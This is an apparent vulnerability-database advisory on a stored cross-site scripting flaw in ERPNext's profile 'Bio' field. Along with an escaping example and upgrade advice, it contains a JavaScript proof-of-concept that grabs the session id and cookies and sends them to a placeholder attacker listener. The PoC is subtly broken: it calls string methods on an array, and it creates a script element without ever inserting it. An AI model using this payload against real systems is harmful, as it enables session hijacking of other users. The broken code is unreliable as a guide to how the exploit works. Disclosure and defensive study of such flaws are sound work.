Mend Vulnerability Database
Date: June 22, 2022
Details
In ERPNext, versions v12.0.9 through v13.0.3 are vulnerable to Stored Cross-Site Scripting (XSS) because user input is not validated properly. A low-privileged attacker could inject arbitrary code into input fields when editing their profile.
PoC Details
Log in as a low-privileged application user, go to the ‘My profile’ section under “Settings”, then click the ‘Edit Profile’ button. Edit the ‘Bio’ input field and insert the XSS payload shown in the PoC code section. Then create a file ‘test1.js’ as described in the PoC code and set up a simple HTTP listener. Once a user logs in, the payload is executed and that user’s session cookie is compromised. Using the captured data, the attacker can log in as the other user.
PoC Code

```javascript
// Regex intended to find the "sid" (session id) field in the page source.
var re = /\\"sid\\":\\s\\"[0-9a-zA-Z]+\\"/gm;
// Regex intended to pull the alphanumeric value out of the matched text.
var te = /[0-9a-zA-Z]+/gm;
// Search the rendered document for the session id.
var getSID = (document.documentElement.innerHTML).match(re);
getSID = getSID.split(':');
getSID = getSID.match(te);
// Build a request to the listener described in the PoC details.
url = 'http://<attacker-ip>:<port>/?sid='+getSID;
var script = document.createElement('script');
script.src = url+"&details= " + document.cookie;
```
Affected Environments
ERPNext versions v12.0.9 through v13.0.3

Prevention
Upgrade to ERPNext version 13.1.0
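The root cause described above is that a user-controlled profile field (the ‘Bio’) is rendered as markup rather than as text. The following is an added example, not ERPNext’s own code, showing the vulnerable rendering pattern beside the hardened one: the `escapeHtml`, `renderBioVulnerable` and `renderBioSafe` functions and the `SAMPLE_BIO` string are all constructed for this illustration and are not part of the project.

```javascript
// Added example (not ERPNext code): rendering an untrusted profile "Bio" value.
// Assumption: the vulnerable pattern interpolates the raw string into HTML;
// the hardened pattern HTML-escapes it first so the browser treats it as text.

// Minimal HTML escaper covering the characters that change meaning in
// element content and in quoted attribute values.
function escapeHtml(input) {
  const map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  };
  return String(input).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable rendering: the bio string is inserted as markup, so any
// <script> or event-handler attribute it carries becomes live.
function renderBioVulnerable(bio) {
  return `<div class="bio">${bio}</div>`;
}

// Hardened rendering: the same string is escaped, so a stored payload is
// displayed literally instead of executed.
function renderBioSafe(bio) {
  return `<div class="bio">${escapeHtml(bio)}</div>`;
}

// Constructed sample input: a bio carrying an external script tag, the shape
// of payload the advisory describes (the host is a placeholder).
const SAMPLE_BIO = 'Hello <script src="http://placeholder.invalid/x.js"></script>';

// Self-check when run directly with Node: the first line contains a live
// <script> tag, the second contains only &lt;script ...&gt; text.
console.log(renderBioVulnerable(SAMPLE_BIO));
console.log(renderBioSafe(SAMPLE_BIO));
```

In a real template engine the equivalent is to use the engine’s auto-escaping output (or `textContent` when writing into the DOM) rather than string concatenation into `innerHTML`; the escaper here only makes the difference between the two renderings visible.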
Good to know:

CVSS v3 metrics
| Attack Vector (AV)      | Network  |
| Attack Complexity (AC)  | Low      |
| Privileges Required (PR)| Low      |
| User Interaction (UI)   | Required |

CVSS v2 metrics
| Access Vector (AV)      | Network  |
| Access Complexity (AC)  | Medium   |